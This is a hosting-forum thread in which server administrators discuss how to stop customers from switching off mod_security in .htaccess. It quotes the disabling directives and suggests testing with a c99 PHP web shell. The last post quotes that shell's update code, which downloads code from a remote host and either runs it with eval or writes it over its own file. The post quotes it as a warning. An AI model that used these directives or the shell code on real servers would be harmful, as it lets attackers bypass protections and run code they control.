Thread: How to disable overriding mod_security config via .htaccess

  1. #1
    Member
    Join Date
    Apr 2010
    Posts
    30

    Default How to disable overriding mod_security config via .htaccess

    Hi,

    If a user wanted to break the server, he could easily bypass the rules by opening a .htaccess file and
    writing the following into it:
    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>

    Or maybe a hacker could bypass it too.

    So it is wise to disable the ability of users to override it.

    I have searched a lot and found that the way to do it is:
    /usr/local/apache/bin/apxs -D DISABLE_HTACCESS_CONFIG -cia mod_security.c

    I was able to compile it with one of the mod_security.c files from version 1.9.5,
    but as it was too old some errors occurred:

    Syntax error on line 10 of /usr/local/apache/conf/modsec2.user.conf:
    Invalid parts specification for SecAuditLogParts: ABIFHZ
    httpd not running, trying to start
    [root@box1 modsec_rules]# nano /usr/local/apache/conf/modsec2.user.conf

    I tried recompiling with the latest 2.6.6 but I get compilation errors.


    So my question is: is it possible to just compile what EasyApache has done with the .htaccess module disabled, or do I have to reinstall and compile modsecurity by hand from scratch? I would also like some guidance and instructions for version 2.6.6.

    Thanks

  2. #2
    BANNED
    Join Date
    Apr 2012
    Location
    Utah
    Posts
    117
    cPanel/WHM Access Level

    DataCenter Provider

    Default Re: How to disable overriding mod_security config via .htaccess

    I generally first set up mod_security with EasyApache and then manually recompile and install mod_security over it, replacing the cPanel installation with one patched to disallow .htaccess overrides.

    It would be very nice if cPanel had that set up in EasyApache by default, but at this time that's how I have to do it.

    If you want to be particularly nasty, you could write a quick simple script to grep all the .htaccess files for "SecFilterEngine" or "mod_security.c" and automatically suspend any accounts where it is found.

  3. #3
    cPanel Staff cPanelTristan's Avatar
    Join Date
    Oct 2010
    Location
    somewhere over the rainbow
    Posts
    7,611
    cPanel/WHM Access Level

    Root Administrator

    Default Re: How to disable overriding mod_security config via .htaccess

    If a hacker already had access to the account, there would be no need at that point to disable mod_security for the account by the hacker. If you have a foot in the door, you don't then start drilling extra holes in that door to get in when you are already inside the house.

    The only reason a site owner might do it would be because the rules being used are impacting a page or pages displaying, and then most users wouldn't be aware of how to even do it.

    If you would like to see this option available, it would be best to post a feature request to change the configuration option:

    Feature Requests for cPanel & WHM
    -- Tristan, Technical Analyst III, Forums Specialist, cPanel Tech Support

  4. #4
    Member
    Join Date
    Apr 2010
    Posts
    30

    Default Re: How to disable overriding mod_security config via .htaccess

    To find them all I used:

    find /home2 -type f -name ".htaccess" -print0 | xargs -0 grep -l "SecFilterScanPOST"

    This will list all .htaccess files that contain SecFilterScanPOST.

    The thing is that we don't want to allow users to manually edit .htaccess files in a way that allows hackers to intrude into the system.
    It is not the hacker who would be able to change .htaccess.

    Thanks

    - - - Updated - - -

    @NetMantis
    could you please provide me details of how to implement this?

    Thanks
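
The .htaccess audit suggested in posts #2 and #4, written out as an added example (not part of any post in this thread): it reports the owner, file and line of every active `SecFilterEngine Off` or `SecFilterScanPOST Off`, skipping commented-out lines and matching case-insensitively. The function names are hypothetical, and `stat -c` assumes GNU coreutils.

```sh
#!/bin/sh
# Added example: report .htaccess files that try to switch off ModSecurity 1.x.
# Directive names are the ones quoted in the thread; function names are hypothetical.

# Active (uncommented) "<directive> Off" lines only, optional quotes around the
# value, trailing whitespace or CR tolerated. Used with grep -i because Apache
# directive names are case-insensitive.
MODSEC_OVERRIDE_RE='^[[:space:]]*(SecFilterEngine|SecFilterScanPOST)[[:space:]]+"?off"?[[:space:]]*$'

# find_modsec_overrides ROOT
# Prints one tab-separated line per hit: owner, file, line number, matching line.
find_modsec_overrides() {
    find "$1" -type f -name .htaccess -exec sh -c '
        re=$1; shift
        for f in "$@"; do
            # stat -c is GNU coreutils (assumption); fall back to "unknown" elsewhere
            owner=$(stat -c %U "$f" 2>/dev/null || echo unknown)
            # -a: never skip a file as binary, -n: line numbers, -i: ignore case
            grep -aniE "$re" "$f" 2>/dev/null | while IFS= read -r hit; do
                printf "%s\t%s\t%s\t%s\n" "$owner" "$f" "${hit%%:*}" "${hit#*:}"
            done
        done
    ' sh "$MODSEC_OVERRIDE_RE" {} +
}

# count_modsec_overrides ROOT
# Prints the number of distinct .htaccess files with at least one hit.
count_modsec_overrides() {
    find_modsec_overrides "$1" | cut -f2 | sort -u | wc -l | tr -d ' '
}

# Scan the directory given as the first argument, if any.
if [ "$#" -gt 0 ]; then
    find_modsec_overrides "$1"
fi
```

Pass the directory to scan, such as the `/home2` tree from post #4, as the first argument.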

  5. #5
    BANNED
    Join Date
    Apr 2012
    Location
    Utah
    Posts
    117
    cPanel/WHM Access Level

    DataCenter Provider

    Default Re: How to disable overriding mod_security config via .htaccess

    Quote Originally Posted by CpanelTristan
    If a hacker already had access to the account, there would be no need at that point to disable mod_security for the account by the hacker. If you have a foot in the door, you don't then start drilling extra holes in that door to get in when you are already inside the house
    You very clearly missed the whole point entirely!

    We aren't talking about hackers or anyone already hacking the accounts.

    We are discussing preventing a security vulnerability from being opened that could lead to hacking.

    What I was talking about doing above was auto-suspending users who attempt to bypass mod_security, not as a means of making anything more secure (I already have it locked down so that it is physically impossible to do that anyway) but rather to get the immediate undivided attention of any user who tries to do so!

    With the .htaccess options disabled in the compile for mod_security, the user couldn't do anything anyway but I want them to know that they should not be trying to disable it and that I know that they made the attempt to do so!

    Quote Originally Posted by voshka
    The thing is that we don't want to allow users to manually edit .htaccess files in a way that allows hackers to intrude into the system.
    It is not the hacker who would be able to change .htaccess.
    It would seem that voshka understood the whole exact point precisely!

    Quote Originally Posted by voshka
    @NetMantis
    could you please provide me details of how to implement this?
    Sure, no problem! I'll shoot you over a private message with my contact info and we can get together on this.

    I'll be out and about most of the day today after this morning but I should be back this evening and will also be around all day long tomorrow so whenever you can catch up to me on that, I'd be happy to give you a hand.

  6. #6
    cPanel Staff cPanelTristan's Avatar
    Join Date
    Oct 2010
    Location
    somewhere over the rainbow
    Posts
    7,611
    cPanel/WHM Access Level

    Root Administrator

    Default Re: How to disable overriding mod_security config via .htaccess

    Again, if this is important to you, you would want to open up a feature request. You might link to it in this thread if you've done so for others who run into the topic to post onto that feature request.
    -- Tristan, Technical Analyst III, Forums Specialist, cPanel Tech Support

  7. #7
    Member
    Join Date
    Jun 2012
    Posts
    12
    cPanel/WHM Access Level

    Root Administrator

    Default Re: How to disable overriding mod_security config via .htaccess

    Yeah right, Mod_security 2 cannot be disabled from .htaccess.
    (only from httpd.conf).

    So relax....
    Last edited by borgia; 07-15-2012 at 07:05 PM.

  8. #8
    Member
    Join Date
    Apr 2010
    Posts
    30

    Default Re: How to disable overriding mod_security config via .htaccess

    It actually can.
    Please make a test and put this into one of the domains' .htaccess and upload and test a shell in that directory:

    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>

    or

    <IfModule mod_security2.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>

  9. #9
    Member
    Join Date
    Jun 2012
    Posts
    12
    cPanel/WHM Access Level

    Root Administrator

    Default Re: How to disable overriding mod_security config via .htaccess

    I am sorry what do you mean by "test a shell in that directory" ? I tested in browser and everything is working, mod_security wasn't disabled.

    Regards

  10. #10
    Member
    Join Date
    Apr 2010
    Posts
    30

    Default Re: How to disable overriding mod_security config via .htaccess

    Quote Originally Posted by borgia View Post
    I am sorry what do you mean by "test a shell in that directory" ? I tested in browser and everything is working, mod_security wasn't disabled.

    Regards
    I mean to upload a PHP shell, let's say the c99 PHP shell or one of the others.
    Put that in the .htaccess and then use your browser to point to that PHP shell.
    It must be working if you put that in .htaccess,
    and this disables all the mod_security analyzing and filtering features.

    Thanks

  11. #11
    Member
    Join Date
    Jun 2012
    Posts
    12
    cPanel/WHM Access Level

    Root Administrator

    Default Re: How to disable overriding mod_security config via .htaccess

    I didn't test with that; I am using something else so that those PHP shells are automatically removed at upload time. But you can restrict those PHP shells to run only in the user's directory (open_basedir in your custom php.ini for each virtual host), so there will be no harm to your server.


    Regards
    Last edited by borgia; 07-15-2012 at 08:02 PM.

  12. #12
    Member
    Join Date
    Apr 2010
    Posts
    30

    Default Re: How to disable overriding mod_security config via .htaccess

    Quote Originally Posted by cPanelTristan View Post
    If a hacker already had access to the account, there would be no need at that point to disable mod_security for the account by the hacker. If you have a foot in the door, you don't then start drilling extra holes in that door to get in when you are already inside the house.

    The only reason a site owner might do it would be because the rules being used are impacting a page or pages displaying, and then most users wouldn't be aware of how to even do it.

    If you would like to see this option available, it would be best to post a feature request to change the configuration option:

    Feature Requests for cPanel & WHM
    Hi

    I have already created a feature request for the main request of this thread,
    but I believe it has something to do with mod_security itself, to have the disable option available in mod_security 2.6.6.
    Please, if anybody knows a fix, help me prevent disabling of mod_security using .htaccess.

    What cPanel Staff mentioned above is somewhat true, but a user could purchase service with the intention to harm, easily disable mod_security using .htaccess, and harm the server.
    Please help me.

    Thanks

  13. #13
    Member
    Join Date
    Jul 2012
    Posts
    36
    cPanel/WHM Access Level

    Root Administrator

    Default Re: How to disable overriding mod_security config via .htaccess

    You can't disable modsec 2.6.6 via .htaccess. These aren't even 2.x directives:

    SecFilterEngine Off
    SecFilterScanPOST Off

    Are you sure you aren't talking about an earlier version of modsec?

  14. #14
    cPanel Staff
    Join Date
    May 2012
    Posts
    10
    cPanel/WHM Access Level

    Root Administrator

    Default Re: How to disable overriding mod_security config via .htaccess

    I mean to upload a PHP shell, let's say the c99 PHP shell
    Don't test with the C99 shell; most variants I have seen will automatically make connections and download updates from a remote (obviously malicious) server.

    A typical example:

    PHP Code:
    $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)

    $c99sh_updateurl = "http://crapsite.ru/update/c99shell/"; //Update server
    $c99sh_sourcesurl = "http://crapsite.ru/files/c99sh_sources/"; //Sources-server

    Here is the update function:

    PHP Code:
    if (!function_exists("c99sh_getupdate"))
    {
    function c99sh_getupdate($update = TRUE)
    {
     $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
     $data = @file_get_contents($url);
     if (!$data) {return "Can't connect to update-server!";}
     else
     {
      $data = ltrim($data);
      $string = substr($data,3,ord($data{2}));
      if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
      if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
      if ($data{0} == "\x99" and $data{1} == "\x03")
      {
       $string = explode("\x01",$string);
       if ($update)
       {
        $confvars = array();
        $sourceurl = $string[0];
        $source = file_get_contents($sourceurl);
        if (!$source) {return "Can't fetch update!";}
        else
        {
         $fp = fopen(__FILE__,"w");
         if (!$fp) {return "Local error: can't write update to ".__FILE__."!
                        You may download c99shell.php manually
                        <a href=\"".$sourceurl."\"><u>here</u></a>.";}
         else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
        }
       }
       else {return "New version are available: ".$string[1];}
      }
      elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
      else {return "Error in protocol: segmentation failed! (".$data.") ";}
     }
    }
    }

    Whatever gets downloaded in this update is probably not something you want.

    There are better ways to do this....
    Last edited by Infopro; 09-07-2012 at 04:42 AM. Reason: edited urls
